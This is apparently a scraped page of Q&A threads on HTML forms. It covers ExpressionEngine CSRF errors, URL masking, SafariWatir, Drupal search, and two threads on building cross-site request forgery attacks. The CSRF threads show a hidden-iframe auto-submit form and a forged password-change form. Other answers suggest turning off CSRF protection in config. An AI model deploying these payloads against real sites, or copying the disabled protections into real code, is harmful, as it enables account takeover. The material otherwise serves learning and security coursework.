Expression engine: This form has expired. Please refresh and try again - expressionengine

I've got a problem with the contact form in Expression Engine. I'm using the code from the docs but after submitting I'm getting this error :
This form has expired. Please refresh and try again.
My code:
{exp:email:contact_form user_recipients="no" recipients="my#emailadress.com" charset="utf-8"}
<h2>Support Form</h2>
<p>
<label for="from">Your Email:</label><br />
<input type="text" id="from" name="from" size="40" maxlength="35" value="{member_email}" />
</p>
<p>
<label for="subject">Subject:</label><br />
<input type="text" id="subject" name="subject" size="40" value="Contact Form" />
</p>
<p>
<label for="message">Message:</label><br />
<textarea id="message" name="message" rows="18" cols="40">
Support Email from: {member_name}
Sent at: {current_time format="%Y %m %d"}
</textarea>
</p>
<p>
<input name="submit" type='submit' value='Submit Form' />
</p>
{/exp:email:contact_form}
I'm using Expression Engine 2.8.0. Thanks guys!

EE requires an XID to be in the form. There is a global variable you can use to generate an XID hash:
<input type="hidden" name="XID" value="{XID_HASH}" />
http://ellislab.com/blog/entry/putting-the-secure-in-secure-mode-forms

For us, adding this to the config.php 'fixed' the problem (more like, put a bandaid on it since it's not an ideal situation)
$config[‘disable_csrf_protection’] = “y”;

I was having this problem only in Chrome and not in Firefox or Safari. I dug into the PHP and realized that it failed this check in Csrf.php:
// Fetch data, these methods enforce token time limits
$this->fetch_session_token();
$this->fetch_request_token();
// Main check
if ($this->request_token === $this->session_token)
{
return TRUE;
}
Then I realized that I had set Chrome to block cookies. I set it so Chrome would allow cookies and I am no longer getting that error message.

I think that's a problem with the secure forms XID hash. You can only submit a form once while using "secure forms" (to stop spammers hijacking them).
A quick way of disabling it is to open system/expressionengine/config/config.php and add this down the bottom to disable it. See if that makes a difference for you.
$config["secure_forms"] = "n";
Obviously using secure forms is preferable though.

Related

What url masking method worked in Javascript disabled browser?

I have tried iframing but it doesn't worked in Javascript disabled browser. Anyone please tell me how can I mask an url and still worked in Javascript disabled situation, thanks in advance.
Use POST, rather than GET. Something like this early in the page:
<form action="nextpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
This page
</form>
<form action="otherpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
That page
</form>
Bit more longwinded, but it will work.

Example of silently submitting a POST FORM (CSRF)

I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).
Example:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
On an external site, what would I need to do to trigger this form automatically and silently?
One solution would be to open the form’s action in a frame like an iframe:
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
When testing CSRF locally you may have to overcome several security measures.
For Blocked loading mixed active content errors, ensure the protocol (http/https) of the attacker site and target site are the same, or use "//" as protocol for attacker site. Example attack on localhost:
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='//localhost:4000' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
<input type='hidden' name='boo' value='true'>
<input type='submit' value='Submit'>
</form>
Alternatively set Firefox security.mixed_content.block_active_content to false.
If using Angular, security options prevent you using inline javascript, so you'll need to move the submit to code-behind on the attacker site:
ngOnInit() {
const myForm: HTMLFormElement = document.getElementById('csrf-form-invisible') as HTMLFormElement;
myForm.submit();
}
Finally the attacker site's header 'x-frame-options' must not be set.

Locating a input of type email with SafariWatir

I just started using Watir to write some simple tests for my web application.
First thing I want to do is to populate an login form with an email input element of type "email" with SafariWatir on OS X.
This won't work:
browser.text_field(:id, "email").set('my#email.com')
Trace:
/Library/Ruby/Gems/1.8/gems/safariwatir-0.4.0/lib/safariwatir/scripter.rb:661:in `execute': Unable to locate TextField, using :id and "email" (Watir::Exception::UnknownObjectException)
from /Library/Ruby/Gems/1.8/gems/safariwatir-0.4.0/lib/safariwatir/scripter.rb:303:in `focus'
from /Library/Ruby/Gems/1.8/gems/safariwatir-0.4.0/lib/safariwatir.rb:525:in `set'
from test.rb:10
I assume that the element is not matched because of the different type attribute value. The documentation does not state any specification for this kind of elements. Any ideas?
Thanks!
Update: adding (reformatted) HTML sample based on user's comment that they are testing pinganalytics
<form action="http://pingalytics.com/" method="post" accept-charset="utf-8">
<p>
<label for="email">Email</label>
<input type="email" name="email" value="" id="email" autofocus="" />
</p>
<p>
<label for="password">Password</label>
<input type="password" name="password" value="" id="password" />
</p>
<input type="submit" name="login" value="Log in with Pingdom" class="primary" />
<p>
<a href="https://www.pingdom.com/signup/">
Sign up
</a>
, or
<a href="https://pp.pingdom.com/index.php/login" title="Reset your Pingdom password">
recover your password
</a>
.
</p>
</form>
the 'email' type for an input element is new as of HTML5. Safariwatir is an older project which pretty much predates HTML5. It has not seen a lot of recent work and it is highly unlikely it would be looking for this type when searching for potential 'text_field' elements.
Watir 3.0 or Watir-webdriver would be a safer bet as a lot of work has gone into those to bring them up to properly supporting HTML5.
Also since Webdriver has just recently added support for Safari (see here for instructions), it is now a viable alternative to safariwatir (which I highly expect will see no further work going forward.)
The Safari support is still a tiny bit DYI as you have to build your own safari extension and it only works on a Mac, but that may change if we see someone start publishing a standard safari extension that could be downloaded from an online gallery

How to construct a Cross Site Request Forgery attack?

I am taking a network security class, and one of our assignments is to find security bugs in open source projects.
This one project that I am working seems susceptible to a CSRF. I constructed the following attack, where I trick the user to click a link containing the following:
<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form>
This attack works and changes the password of the site when the user is currently logged into the site.. however, the result of the page gets rendered to the end user. I tried various methods to "quietly" POST the form (PHP based methods and JS based methods) with no avail.
Can anyone provide some guidance and perhaps point me in the right direction as to whether it's possible to silently POST to another website?
Set the form's target to a hidden <iframe>.

Drupal 7 search parameters

I want to create a custom search box and use that to interact with Drupal's search module. Currently everything works pretty well. However, i would also need to use a proper token with the search. I have no idea what key Drupal uses to form this token.
Currently i have:
<form class="search-form" action="/search/node" method="post" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
<input type="hidden" name="form_id" id="search-form" value="search_theme_form" />
<input type="hidden" name="form_token" value="<?php print drupal_get_token('search_theme_form'); ?>" />
</form>
This works well enough to display the results of one page. If i try to navigate to the second results page, all the results are thrown away.
You should probably use the more proper
$form = drupal_get_form('search_block_form');
return drupal_render($form);
http://api.drupal.org/api/drupal/modules--search--search.module/function/search_form/7
It turned out to be as simple as changing the form from post to get. Here's the html for a working solution.
<form class="search-form" action="/search/node" method="post" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
</form>
You don't need to define tokens or anything of the sort.
And in theme use:
<?php
$form = drupal_get_form('search_block_form');
echo render($form);
?>

Resources